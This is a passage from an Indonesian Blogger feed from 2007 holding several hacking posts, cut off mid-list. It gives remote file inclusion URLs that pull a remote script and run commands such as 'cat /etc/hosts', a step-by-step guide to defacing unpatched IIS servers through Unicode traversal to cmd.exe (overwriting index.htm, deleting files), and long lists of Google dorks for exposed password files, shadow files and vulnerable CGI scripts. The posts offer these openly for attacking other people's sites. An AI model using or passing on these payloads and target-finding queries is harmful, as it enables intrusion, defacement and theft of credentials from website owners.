/etc/hosts&lt;br /&gt;kita juga bisa mencoba target lainnya nya dg keyword base.php, page.php, content.php, view.php, imageview.php, modules.php, dsb.&lt;br /&gt;&lt;br /&gt;4. allinurl link&lt;br /&gt;bugs filename ini targetnya dapat kita cari dengan keyword “allinurl:*.php?link=*”.&lt;br /&gt;keyword ‘*.php’ bisa di ganti dengan file apa saja, misalnya dengan index.php. maka keyword yang kita masukkan di google adalah “allinurl:index.php?link=*”. Setelah mendapatkan target maka buat lah urlnya jadi seperti ini:&lt;br /&gt;http://www.target.com/target/index.php?link=http://www.geocities.com/inul_asoy/injex.txt?&amp;cmd=ls -al;uname -ar;id;pwd;cat /etc/hosts&lt;br /&gt;kita juga bisa mencoba target lainnya nya dg keyword base.php, page.php, content.php, view.php, imageview.php, modules.php, dsb.&lt;br /&gt;&lt;br /&gt;5.allinurl file&lt;br /&gt;bugs file ini targetnya dapat kita cari dengan keyword “allinurl:*.php?file=*”.&lt;br /&gt;‘*.php’ bisa di ganti dengan file apa saja, misalnya dengan index.php. maka keyword yang kita masukkan di google adalah “allinurl:index.php?file=*”. Setelah mendapatkan target maka buat lah urlnya jadi seperti ini:&lt;br /&gt;http://www.target.com/target/index.php?file=http://www.geocities.com/inul_asoy/injex.txt?&amp;cmd=ls -al;uname -ar;id;pwd;cat /etc/hosts&lt;br /&gt;kita juga bisa mencoba target lainnya nya dg keyword base.php, page.php, content.php, view.php, imageview.php, modules.php, dsb.&lt;br /&gt;&lt;br /&gt;thanks&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5833266259433587312-584583370205937834?l=mircku.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5833266259433587312/posts/default/584583370205937834'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5833266259433587312/posts/default/584583370205937834'/><link rel='alternate' type='text/html' href='http://mircku.blogspot.com/2007/09/google-hacking_27.html' title='google hacking'/><author><name>posku</name><uri>http://www.blogger.com/profile/13572930753184865106</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author></entry><entry><id>tag:blogger.com,1999:blog-5833266259433587312.post-1610685683201365444</id><published>2007-09-27T16:38:00.000+07:00</published><updated>2007-09-27T16:40:40.949+07:00</updated><title type='text'>langkah sederhana buat deface</title><content type='html'>hehehe qta sih nda master dalam deface gitu... (still newbie Embarassed )&lt;br /&gt;tapi qta cuman mau bagi2 sedikit informasi yang qta tau...&lt;br /&gt;&lt;br /&gt;semoga berguna Laughing&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;______________________________________________________________&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Langkah 1 : Mencari target&lt;br /&gt;&lt;br /&gt;Mencari target dapat dilakukan dengan berbagai cara hal ini tergantung kreativitas dan sarana yang dimiliki, dalam hal ini bisa berbentuk script IRC, scanner. Sebagai dasar mengetahui OS yang digunakan server suatu site dapat diketahui dengan mencarinya pada situs http://www.netcraft.com/&lt;br /&gt;&lt;br /&gt;Langkah 2 : Unicode&lt;br /&gt;&lt;br /&gt;Setelah target didapat maka digunakan Unicode. Unicode itu sendiri penulis juga tidak terlalu mengetahui secara mendetail, tapi pada dasarnya Unicode menggunakan bahasa ASCII. Server yang menggunakan OS NT dengan IIS sendiri mempunyai bug yang bisa ditembus dengan Unicode dalam hal ini bila server itu belum dipatch. Unicode yang berhasil ditemukan untuk memasuki server NT sudah banyak. Dan yang bisa dicoba sebagai berikut:&lt;br /&gt;&lt;br /&gt;http://target/_vti_bin/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;http://target/scripts/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;http://target/msadc/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;http://target/cgi-bin/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;http://target/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;&lt;br /&gt;Bila Unicode tersebut berhasil maka akan dapat dilihat tampilan seperti berikut:&lt;br /&gt;&lt;br /&gt;Directory of c:\&lt;br /&gt;06/03/01 09:59a (DIR) InetPub&lt;br /&gt;08/08/01 06:14p (DIR) WINNT&lt;br /&gt;&lt;br /&gt;Langkah 3 :Mencari halaman depan&lt;br /&gt;&lt;br /&gt;Saat membuka situs tersebut pada browser, kita pasti akan melihat tampilan muka dari site tersebut, perlu diperhatikan adalah file tampilan muka tersebut apa? biasanya antara lain: index.htm, index.html, default.htm, default.html. Kemudian dengan mengunakan Unicode tersebut kita mencari file tersebut letaknya dimana, biasanya di C:\inetpub\wwwroot (hal ini belum tentu). untuk mencari file tersebut dapat digunakan perintah:&lt;br /&gt;&lt;br /&gt;/c+dir/s+c:\index.htm&lt;br /&gt;&lt;br /&gt;Hal ini berarti perintah mencari file index.htm di dalam drive C&lt;br /&gt;Untuk melihat apakah file index.htm tersebut adalah yang digunakan pada halaman depan, dipergunakan perintah :&lt;br /&gt;&lt;br /&gt;/c+type+c:\direktory dan nama file, contoh : /c+type+c:\inetpub\wwwroot\index.htm&lt;br /&gt;&lt;br /&gt;Setelah anda menemukan file index.htm tersebut, maka sebaiknya anda copy dulu, hal ini agar tindakan Deface kita tidak terlalu merugikan Administrator dari server situs tersebut. Sehingga nantinya Admin tersebut mempunyai backup dari file index.&lt;br /&gt;perintah copy itu sendiri adalah:&lt;br /&gt;&lt;br /&gt;/c+copy+c:\&lt;br /&gt;&lt;br /&gt;contoh untuk pencopyan adalah:&lt;br /&gt;&lt;br /&gt;/c+copy+c:\inetpub\wwwroot\index.htm backupindex.htm&lt;br /&gt;&lt;br /&gt;untuk mempermudah pekerjaan dapat dilakukan pencopyan file cmd.exe yg berada di direktory c:/winnt/system32 dengan menggunakan nama anda, seperti :&lt;br /&gt;&lt;br /&gt;/c+copy+c:\winnt\system32\cmd.exe+c:\deface.exe&lt;br /&gt;&lt;br /&gt;hal ini berarti anda mencopy file cmd.exe ke dir c dgn nama deface.exe, sehingga untuk perintah2 selanjutnya tidak memerlukan /winnt/system32/cmd.exe?/ tapi cukup /deface.exe?/&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Langkah 4 : Meng-Copy file index.htm&lt;br /&gt;&lt;br /&gt;echo dalam dos berarti anda membuat file maka bila file index.htm yg asli anda echo berarti anda timpa dengan file index anda. Untuk perintahnya adalah:&lt;br /&gt;&lt;br /&gt;/deface.exe?/c+echo+"deface+was+here"+&gt;+c:\inetpub\wwwroot\index.htm&lt;br /&gt;&lt;br /&gt;sehingga tampilan site depan telah terganti dengan tulisan&lt;br /&gt;deface was here&lt;br /&gt;&lt;br /&gt;Catatan:&lt;br /&gt;Hal ini berlaku bila file index.htm tersebut dapat diecho, karena sebagian server membatasi direktory root dengan atribut read only, sehingga perintah echo index.htm akan menghasilkan :&lt;br /&gt;Access Denied&lt;br /&gt;Untuk membuat deface anda menjadi lebih bagus, dapat digunakan bahasa HTML dan ASCII&lt;br /&gt;perintah-perintah lain :&lt;br /&gt;&lt;br /&gt;membuat direktory = /c+mkdir+c:\&lt;br /&gt;merubah nama file = /c+ren+c:\file&lt;br /&gt;menghapus file = /c+del+c:\file&lt;br /&gt;menghapus file Read-Only = /c+del+/R+c:\file&lt;br /&gt;_________________&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5833266259433587312-1610685683201365444?l=mircku.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5833266259433587312/posts/default/1610685683201365444'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5833266259433587312/posts/default/1610685683201365444'/><link rel='alternate' type='text/html' href='http://mircku.blogspot.com/2007/09/langkah-sederhana-buat-deface.html' title='langkah sederhana buat deface'/><author><name>posku</name><uri>http://www.blogger.com/profile/13572930753184865106</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author></entry><entry><id>tag:blogger.com,1999:blog-5833266259433587312.post-3769429085610844870</id><published>2007-09-27T16:34:00.000+07:00</published><updated>2007-09-27T16:37:37.865+07:00</updated><title type='text'>hacking google</title><content type='html'>-- 00 // Intro ----------------------------------------------------------&lt;br /&gt;&lt;br /&gt;Banyak sekali website yang berguguran dengan memanfaatkan pencarian pada&lt;br /&gt;Google untuk menemukan targetnya. Seperti Worm Santy yang melakukan&lt;br /&gt;defacing secara massal dengan memanfaatkan Google. Dalam hitungan hari&lt;br /&gt;ribuan website tampilan utamanya berubah.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;--- 01 // Penggunaan Dasar -----------------------------------------------&lt;br /&gt;&lt;br /&gt;- Google tidak "case sensitive".&lt;br /&gt;Keyword: linux = LINUX = LiNuX&lt;br /&gt;Akan menghasilkan hal yang sama&lt;br /&gt;&lt;br /&gt;- AND: Secara Default Google menggunakan keyword and.&lt;br /&gt;Keyword: menjadi hacker&lt;br /&gt;Hasilnya pencarian akan mengandung kata "menjadi" dan "hacker"&lt;br /&gt;&lt;br /&gt;- OR: Digunakan untuk menemukan halaman yang setidaknya berisi salah&lt;br /&gt;satu dari keyword. Note: OR dituliskan dengan huruf besar semua.&lt;br /&gt;Keyword: hacker OR cracker&lt;br /&gt;Hasilnya pencarian akan mengandung kata "hacker" atau "cracker"&lt;br /&gt;&lt;br /&gt;- +: Google akan mengabaikan pencarian dengan kata-kata umum seperti&lt;br /&gt;"how" dan "where". Jika kata-kata umum ini begitu penting, anda&lt;br /&gt;bisa menambahkan "+" didepan keyword tersebut.&lt;br /&gt;Keyword: hacker how ==&gt; Kata "how" akan diabaikan&lt;br /&gt;Keyword: hacker +how ==&gt; Kata "how" akan diikutsertakan&lt;br /&gt;&lt;br /&gt;- -: Tanda minus "-" bisa digunakan untuk mengecualikan kata-kata&lt;br /&gt;tertentu dalam pencarian. Misal kita ingin mencari kata&lt;br /&gt;"linus tanpa linux", kita bisa menggunakan "linus -linux"&lt;br /&gt;&lt;br /&gt;- *: Google tidak mendukung pencarian * sebagai pengganti huruf.&lt;br /&gt;Misalkan kita ingin mencari dengan kata depan menja*&lt;br /&gt;Google tidak mencari kata "menjamu", "menjadi", "menjalar", dll&lt;br /&gt;Google akan menghasilkan pencarian hanya yang mengandung kata&lt;br /&gt;"menja".&lt;br /&gt;&lt;br /&gt;Tetapi google mendukung penggunaan * dalam pencarian kalimat.&lt;br /&gt;Keyword: "menjadi * hacker"&lt;br /&gt;Hasilnya pencarian dapat menghasilkan "menjadi seorang hacker",&lt;br /&gt;"menjadi white hacker", dll.&lt;br /&gt;&lt;br /&gt;- "": Dapat digunakan untuk mencari kata yg lengkap.&lt;br /&gt;Keyword: "menjadi hacker"&lt;br /&gt;Hasilnya pencarian akan mengandung kata "menjadi hacker"&lt;br /&gt;&lt;br /&gt;- ?: Dapat digunakan untuk mencari pada direktori Google&lt;br /&gt;Keyword: ?intitle:index.of? mp3&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;--- 02 // Operator Spesial -----------------------------------------------&lt;br /&gt;&lt;br /&gt;-- Contoh hasil pencarian --&lt;br /&gt;&lt;br /&gt;Google --&gt; Judul&lt;br /&gt;... Language Tools. Ways to help with tsunami relief \&lt;br /&gt;Advertising Programs - About Google ©2005 Google - &gt; Deskripsi&lt;br /&gt;Searching 8,058,044,651 web pages. /&lt;br /&gt;www.google.com/ - 3k - 5 Jan 2005 --&gt; URL&lt;br /&gt;&lt;br /&gt;-- Contoh hasil pencarian --&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;- intitle: Untuk mencari kata-kata dari judul suatu halaman web.&lt;br /&gt;Keyword: intitle:Admin Administrasi&lt;br /&gt;Keyword tersebut akan mencari judul halaman "Admin" dengan&lt;br /&gt;deskripsi "Administrasi"&lt;br /&gt;&lt;br /&gt;- allintitle: Untuk mencari kata-kata dari judul halaman web&lt;br /&gt;secara lengkap.&lt;br /&gt;Keyword: allintitle:Admin Administrasi&lt;br /&gt;Keyword tersebut akan mencari judul halaman yang mengandung&lt;br /&gt;kata "Admin" dan "Administrasi"&lt;br /&gt;&lt;br /&gt;- inurl: Digunakan untuk mencari semua URL yang berisi kata-kata&lt;br /&gt;tertentu.&lt;br /&gt;Keyword: inurl:Admin Administrasi&lt;br /&gt;Keyword tersebut akan mencari URL yang mengandung kata "Admin"&lt;br /&gt;dengan deskripsi "Administrasi"&lt;br /&gt;&lt;br /&gt;- allinurl: Digunakan untuk mencari semua URL yang berisi kata-kata&lt;br /&gt;tertentu.&lt;br /&gt;Keyword: allinurl:Admin Administrasi&lt;br /&gt;Keyword tersebut akan mencari URL yang mengandung kata "Admin"&lt;br /&gt;dan "Administrasi"&lt;br /&gt;&lt;br /&gt;- site: Untuk mencari dalam suatu situs tertentu saja&lt;br /&gt;Keyword: site:echo.or.id&lt;br /&gt;Semua pencarian hanya berdasarkan site "echo.or.id"&lt;br /&gt;&lt;br /&gt;- cache: Ketika Googlebot mengindeks suatu situs, google akan&lt;br /&gt;mengambil snapshot dari semua halaman yang telah terindeks.&lt;br /&gt;Operator ini membantu melihat halaman-halaman yang telah&lt;br /&gt;dicache.&lt;br /&gt;Keyword: cache:echo.or.id&lt;br /&gt;Misalkan site aslinya sudah tidak aktif, anda tetap dapat melihatnya&lt;br /&gt;pada snapshot/cache yang disimpan oleh Google.&lt;br /&gt;&lt;br /&gt;- define: Operator ini digunakan untuk mencari definisi dari frasa&lt;br /&gt;tertentu. Semua kata yang diketik setelah operator ini akan&lt;br /&gt;diperlakukan sebagai satu frasa.&lt;br /&gt;Keyword: define:hacker&lt;br /&gt;&lt;br /&gt;- filetype: Jika kita mencari jenis file tertentu yang berisi informasi&lt;br /&gt;yang anda inginkan kita bisa menggunakan operator ini.&lt;br /&gt;Keyword: "hacker" filetype:pdf&lt;br /&gt;Sampai tulisan ini dibuat google support tipe file&lt;br /&gt;# Adobe Portable Document Format (pdf)&lt;br /&gt;# Adobe PostScript (ps)&lt;br /&gt;# Lotus 1-2-3 (wk1, wk2, wk3, wk4, wk5, wki, wks, wku)&lt;br /&gt;# Lotus WordPro (lwp)&lt;br /&gt;# MacWrite (mw)&lt;br /&gt;# Microsoft Excel (xls)&lt;br /&gt;# Microsoft PowerPoint (ppt)&lt;br /&gt;# Microsoft Word (doc)&lt;br /&gt;# Microsoft Works (wks, wps, wdb)&lt;br /&gt;# Microsoft Write (wri)&lt;br /&gt;# Rich Text Format (rtf)&lt;br /&gt;# Shockwave Flash (swf)&lt;br /&gt;# Text (ans, txt)&lt;br /&gt;Ref: http://www.google.com/help/faq_filetypes.html&lt;br /&gt;&lt;br /&gt;- link: Untuk mencari tahu berapa banyak link ke suatu situs, kita bisa&lt;br /&gt;menggunakan operator link.&lt;br /&gt;Keyword: link:www.google.com&lt;br /&gt;&lt;br /&gt;- related: Untuk mencari halaman yang isinya mirip dengan URL tertentu.&lt;br /&gt;Keyword: related:www.google.com&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;--- 03 // Manipulasi URL Google ------------------------------------------&lt;br /&gt;&lt;br /&gt;&gt; And bisa mengganti interface google dengan mengganti variabel hl&lt;br /&gt;(default google hl=en =&gt; bahasa inggris)&lt;br /&gt;Misalkan kita mengubah interface-nya menjadi bahasa Indonesia.&lt;br /&gt;Ex:&lt;br /&gt;http://www.google.com/search?hl=en&amp;lr=&amp;q=site%3Aecho.or.id&amp;btnG=Search&lt;br /&gt;Hasil modifikasi URL&lt;br /&gt;http://www.google.com/search?hl=id&amp;lr=&amp;q=site%3Aecho.or.id&amp;btnG=Search&lt;br /&gt;&lt;br /&gt;&gt; Anda dapat mengganti hasil pencarian hanya pada bahasa tertentu. Hal ini&lt;br /&gt;dilakukan dengan modifikasi variabel lr.&lt;br /&gt;(default google lr=lang_en =&gt; bahasa inggris)&lt;br /&gt;Misalkan kita hasil pencarian hanya bahasa Indonesia.&lt;br /&gt;Ex:&lt;br /&gt;http://www.google.com/search?hl=en&amp;lr=&amp;q=site%3Aecho.or.id&amp;btnG=Search&lt;br /&gt;Hasil modifikasi URL&lt;br /&gt;http://www.google.com/search?hl=en&amp;lr=lang_id&amp;q=site%3Aecho.or.id&amp;btnG=Search&lt;br /&gt;&lt;br /&gt;&gt; Secara default google akan menampilkan 10 site perhalaman. Anda dapat&lt;br /&gt;mengubahnya secara langsung melalui URL-nya, dengan menambahkan variabel&lt;br /&gt;num pada URL Very Happy&lt;br /&gt;Penggunaan num antara 1-100&lt;br /&gt;Ex:&lt;br /&gt;http://www.google.com/search?hl=en&amp;lr=&amp;q=site%3Aecho.or.id&amp;btnG=Search&lt;br /&gt;Hasil modifikasi URL&lt;br /&gt;http://www.google.com/search?num=100&amp;hl=en&amp;lr=&amp;q=site%3Aecho.or.id&amp;btnG=Search&lt;br /&gt;&lt;br /&gt;&gt; as_qdr=mx: merupakan variabel lainnya yang dapat digunakan. Variabel ini&lt;br /&gt;digunakan menentukan hasil berdasarkan bulan. x antara 1-12&lt;br /&gt;Ex:&lt;br /&gt;http://www.google.com/search?hl=en&amp;lr=&amp;q=site%3Aecho.or.id&amp;btnG=Search&lt;br /&gt;Hasil modifikasi URL&lt;br /&gt;http://www.google.com/search?hl=en&amp;lr=&amp;as_qdr=m1&amp;q=site%3Aecho.or.id&amp;btnG=Search&lt;br /&gt;&lt;br /&gt;&gt; safe=off: arti dari variabel ini filter "SafeSearch" dimatikan. "SafeSearch"&lt;br /&gt;untuk memfilter hasil pencarian sexual.&lt;br /&gt;&lt;br /&gt;Dengan pengetahuan di atas anda dapat membuat sendiri form Google di komputer&lt;br /&gt;sendiri. Sehingga tidak perlu lagi mengunjungi http://www.google.com terlebih&lt;br /&gt;dahulu (kecuali anda menggunakan brwoser yang support google secara built-in&lt;br /&gt;atau menggunakan Google Toolbar). Dengan melakukan ini kita bisa menghemat&lt;br /&gt;bandwidth ke luar negeri Very Happy&lt;br /&gt;Karena bandwidth di Indonesia mahal ........&lt;br /&gt;&lt;br /&gt;Contoh script google.html lengkap dengan varabielnya.&lt;br /&gt;&lt;br /&gt;--- BOF google.html ---&lt;br /&gt;&lt;br /&gt;&lt;form action="http://www.google.com/search" name=f&gt;&lt;br /&gt;Variabel num: &lt;input name=num value=10&gt;&lt;br&gt;&lt;br /&gt;Variabel hl: &lt;input name=hl value=en&gt;&lt;br&gt;&lt;br /&gt;Variabel lr: &lt;input name=lr value=lang_id&gt;&lt;br&gt;&lt;br /&gt;Variabel as_qdr: &lt;input name=as_qdr value=m12&gt;&lt;br&gt;&lt;br /&gt;Variabel safe: &lt;input name=safe value=off&gt;&lt;br&gt;&lt;br /&gt;&lt;input maxLength=256 size=55 name=q value=""&gt;&lt;br&gt;&lt;br /&gt;&lt;input type=submit value="Google Search" name=btnG&gt;&lt;br /&gt;&lt;/form&gt;&lt;br /&gt;&lt;br /&gt;--- EOF google.html ---&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Anda tinggal menghilangkan Variabel yang tidak anda inginkan atau&lt;br /&gt;menambahkan apapun disana. Semuanya terserah kepada anda Very Happy&lt;br /&gt;Berikut merupakan script default pencarian google.&lt;br /&gt;&lt;br /&gt;--- BOF google.html ---&lt;br /&gt;&lt;br /&gt;&lt;form action="http://www.google.com/search" name=f&gt;&lt;br /&gt;&lt;input maxLength=256 size=55 name=q value=""&gt;&lt;br&gt;&lt;br /&gt;&lt;input type=submit value="Google Search" name=btnG&gt;&lt;br /&gt;&lt;/form&gt;&lt;br /&gt;&lt;br /&gt;--- EOF google.html ---&lt;br /&gt;&lt;br /&gt;Google masih terus dikembangkan. Untuk melihat apa yang sedang&lt;br /&gt;dikembangkan Google. Anda bisa ke http://labs.google.com&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;--- 04 // Tips &amp; Tricks --------------------------------------------------&lt;br /&gt;&lt;br /&gt;Dari dasar-dasar dan spesial operator tersebut anda bisa mencampurkan&lt;br /&gt;operator-operator tersebut.&lt;br /&gt;&lt;br /&gt;Ex:&lt;br /&gt;- Keyword: site:echo.or.id, menghasilkan semua site echo.or.id. Kemudian&lt;br /&gt;anda bisa mencoba keyword: site:echo.or.id hacker, akan menghasilkan&lt;br /&gt;semua site echo.or.id yang mengandung kata hacker.&lt;br /&gt;&lt;br /&gt;Kita juga dapat melakukan pencarian secara spesifik melalui google.&lt;br /&gt;Untuk melakukannya anda dapat ke site berikut:&lt;br /&gt;- http://www.google.com/bsd&lt;br /&gt;- http://www.google.com/mac&lt;br /&gt;- http://www.google.com/linux&lt;br /&gt;- http://www.google.com/microsoft&lt;br /&gt;- http://www.google.com/univ/education&lt;br /&gt;&lt;br /&gt;Berbagai trik keyword pada Google:&lt;br /&gt;parent directory books -xxx -html -htm -php -shtml -opendivx -md5 -md5sums&lt;br /&gt;parent directory /appz/ -xxx -html -htm -php -shtml -opendivx -md5 -md5sums&lt;br /&gt;parent directory DVDRip -xxx -html -htm -php -shtml -opendivx -md5 -md5sums&lt;br /&gt;parent directory video -xxx -html -htm -php -shtml -opendivx -md5 -md5sums&lt;br /&gt;parent directory Gamez -xxx -html -htm -php -shtml -opendivx -md5 -md5sums&lt;br /&gt;parent directory MP3 -xxx -html -htm -php -shtml -opendivx -md5 -md5sums&lt;br /&gt;&lt;br /&gt;intitle:index of intitle:mp3 -html -htm name size&lt;br /&gt;intitle:index of intitle:video -html -htm name size&lt;br /&gt;intitle:index of intitle:cgi-bin passwd -html -htm name size&lt;br /&gt;intitle:index of intitle:cgi-bin password -html -htm name size&lt;br /&gt;&lt;br /&gt;inurl:"admin.mdb" -html&lt;br /&gt;inurl:"password.mdb" -html&lt;br /&gt;inurl:"data.mdb" -html&lt;br /&gt;"phpMyAdmin" "running on" inurl:"main.php"&lt;br /&gt;intitle:"PHP Shell" "Enable stderr" php&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Just to b references..&lt;br /&gt;&lt;br /&gt;"Index of /admin"&lt;br /&gt;"Index of /password"&lt;br /&gt;"Index of /mail"&lt;br /&gt;"Index of /" +passwd&lt;br /&gt;"Index of /" +password.txt&lt;br /&gt;"Index of /" +.htaccess&lt;br /&gt;index of ftp +.mdb allinurl:/cgi-bin/ +mailto&lt;br /&gt;administrators.pwd.index&lt;br /&gt;authors.pwd.index&lt;br /&gt;service.pwd.index&lt;br /&gt;filetype:config web&lt;br /&gt;gobal.asax index&lt;br /&gt;allintitle: "index of/admin"&lt;br /&gt;allintitle: "index of/root"&lt;br /&gt;allintitle: sensitive filetype:doc&lt;br /&gt;allintitle: restricted filetype :mail&lt;br /&gt;allintitle: restricted filetype:doc site:gov&lt;br /&gt;inurlasswd filetype:txt&lt;br /&gt;inurl:admin filetype:db&lt;br /&gt;inurl:iisadmin&lt;br /&gt;inurl:"auth_user_file.txt"&lt;br /&gt;inurl:"wwwroot/*."&lt;br /&gt;top secret site:mil&lt;br /&gt;confidential site:mil&lt;br /&gt;allinurl: winnt/system32/ (get cmd.exe)&lt;br /&gt;allinurl:/bash_history&lt;br /&gt;intitle:"Index of" .sh_history&lt;br /&gt;intitle:"Index of" .bash_history&lt;br /&gt;intitle:"index of" passwd&lt;br /&gt;intitle:"index of" people.lst&lt;br /&gt;intitle:"index of" pwd.db&lt;br /&gt;intitle:"index of" etc/shadow&lt;br /&gt;intitle:"index of" spwd&lt;br /&gt;intitle:"index of" master.passwd&lt;br /&gt;intitle:"index of" htpasswd&lt;br /&gt;intitle:"index of" members OR accounts&lt;br /&gt;intitle:"index of" user_carts OR user_cart&lt;br /&gt;ALTERNATIVE INPUTS====================&lt;br /&gt;_vti_inf.html&lt;br /&gt;service.pwd&lt;br /&gt;users.pwd&lt;br /&gt;authors.pwd&lt;br /&gt;administrators.pwd&lt;br /&gt;shtml.dll&lt;br /&gt;shtml.exe&lt;br /&gt;fpcount.exe&lt;br /&gt;default.asp&lt;br /&gt;showcode.asp&lt;br /&gt;sendmail.cfm&lt;br /&gt;getFile.cfm&lt;br /&gt;imagemap.exe&lt;br /&gt;test.bat&lt;br /&gt;msadcs.dll&lt;br /&gt;htimage.exe&lt;br /&gt;counter.exe&lt;br /&gt;browser.inc&lt;br /&gt;hello.bat&lt;br /&gt;default.aspdvwssr.dll&lt;br /&gt;cart32.exe&lt;br /&gt;add.exe&lt;br /&gt;index.jsp&lt;br /&gt;SessionServlet&lt;br /&gt;shtml.dll&lt;br /&gt;index.cfm&lt;br /&gt;page.cfm&lt;br /&gt;shtml.exe&lt;br /&gt;web_store.cgi&lt;br /&gt;shop.cgi&lt;br /&gt;upload.asp&lt;br /&gt;default.asp&lt;br /&gt;pbserver.dll&lt;br /&gt;phf&lt;br /&gt;test-cgi&lt;br /&gt;finger&lt;br /&gt;Count.cgi&lt;br /&gt;jj&lt;br /&gt;php.cgi&lt;br /&gt;php&lt;br /&gt;nph-test-cgi&lt;br /&gt;handler&lt;br /&gt;webdist.cgi&lt;br /&gt;webgais&lt;br /&gt;websendmail&lt;br /&gt;faxsurvey&lt;br /&gt;htmlscript&lt;br /&gt;perl.exe&lt;br /&gt;wwwboard.pl&lt;br /&gt;www-sql&lt;br /&gt;view-source&lt;br /&gt;campas&lt;br /&gt;aglimpse&lt;br /&gt;glimpse&lt;br /&gt;man.sh&lt;br /&gt;AT-admin.cgi&lt;br /&gt;AT-generate.cgi&lt;br /&gt;filemail.pl&lt;br /&gt;maillist.pl&lt;br /&gt;info2www&lt;br /&gt;files.pl&lt;br /&gt;bnbform.cgi&lt;br /&gt;survey.cgi&lt;br /&gt;classifieds.cgi&lt;br /&gt;wrap&lt;br /&gt;cgiwrap&lt;br /&gt;edit.pl&lt;br /&gt;perl&lt;br /&gt;names.nsf&lt;br /&gt;webgais&lt;br /&gt;dumpenv.pl&lt;br /&gt;test.cgi&lt;br /&gt;submit.cgi&lt;br /&gt;guestbook.cgi&lt;br /&gt;guestbook.pl&lt;br /&gt;cachemgr.cgi&lt;br /&gt;responder.cgi&lt;br /&gt;perlshop.cgi&lt;br /&gt;query&lt;br /&gt;w3-msql&lt;br /&gt;plusmail&lt;br /&gt;htsearch&lt;br /&gt;infosrch.cgi&lt;br /&gt;publisher&lt;br /&gt;ultraboard.cgi&lt;br /&gt;db.cgi&lt;br /&gt;formmail.cgi&lt;br /&gt;allmanage.pl&lt;br /&gt;ssi&lt;br /&gt;adpassword.txt&lt;br /&gt;redirect.cgi&lt;br /&gt;cvsweb.cgi&lt;br /&gt;login.jsp&lt;br /&gt;dbconnect.inc&lt;br /&gt;admin&lt;br /&gt;htgrep&lt;br /&gt;wais.pl&lt;br /&gt;amadmin.pl&lt;br /&gt;subscribe.pl&lt;br /&gt;news.cgi&lt;br /&gt;auctionweaver.pl&lt;br /&gt;.htpasswd&lt;br /&gt;acid_main.php&lt;br /&gt;access.log&lt;br /&gt;log.htm&lt;br /&gt;log.html&lt;br /&gt;log.txt&lt;br /&gt;logfile&lt;br /&gt;logfile.htm&lt;br /&gt;logfile.html&lt;br /&gt;logfile.txt&lt;br /&gt;logger.html&lt;br /&gt;stat.htm&lt;br /&gt;stats.htm&lt;br /&gt;stats.html&lt;br /&gt;stats.txt&lt;br /&gt;webaccess.htm&lt;br /&gt;wwwstats.html&lt;br /&gt;source.asp&lt;br /&gt;perl&lt;br /&gt;mailto.cgi&lt;br /&gt;YaBB.pl&lt;br /&gt;mailform.pl&lt;br /&gt;cached_feed.cgi&lt;br /&gt;global.cgi&lt;br /&gt;Search.pl&lt;br /&gt;build.cgi&lt;br /&gt;common.php&lt;br /&gt;show&lt;br /&gt;global.inc&lt;br /&gt;ad.cgi&lt;br /&gt;WSFTP.LOG&lt;br /&gt;index.html~&lt;br /&gt;index.php~&lt;br /&gt;index.html.bak&lt;br /&gt;index.php.bak&lt;br /&gt;print.cgi&lt;br /&gt;register.cgi&lt;br /&gt;webdriver&lt;br /&gt;bbs_forum.cgi&lt;br /&gt;mysql.class&lt;br /&gt;sendmail.inc&lt;br /&gt;CrazyWWWBoard.cgi&lt;br /&gt;search.pl&lt;br /&gt;way-board.cgi&lt;br /&gt;webpage.cgi&lt;br /&gt;pwd.dat&lt;br /&gt;adcycle&lt;br /&gt;post-query&lt;br /&gt;help.cgi&lt;br /&gt;/robots.txt&lt;br /&gt;/admin.mdb&lt;br /&gt;/shopping.mdb&lt;br /&gt;/arg;&lt;br /&gt;/stats/styles.css&lt;br /&gt;/statshelp.htm&lt;br /&gt;/favicon.ico&lt;br /&gt;/stats/admin.mdb&lt;br /&gt;/shopdbtest.asp&lt;br /&gt;/cgi-bin/test.cgi&lt;br /&gt;/cgi-bin/test.pl&lt;br /&gt;/cgi-bin/env.cgi&lt;br /&gt;/photos/protest/styles.css&lt;br /&gt;http://hpcgi1.nifty.com/trino/ProxyJ/prxjdg.cgi&lt;br /&gt;/cgi-bin/whereami.cgi&lt;br /&gt;/shopping400.mdb&lt;br /&gt;/cgi/test.cgi&lt;br /&gt;/cgi-bin/test2.pl&lt;br /&gt;/photos/protest/kingmarch_02.html&lt;br /&gt;/chevy/index.htm&lt;br /&gt;/cgi-bin/glocation.cgi&lt;br /&gt;/cgi-bin/test2.cgi&lt;br /&gt;/ccbill/glocation.cgi&lt;br /&gt;/cgi-bin/styles.css&lt;br /&gt;/shopping350.mdb&lt;br /&gt;/cgi-bin/shopper.cgi&lt;br 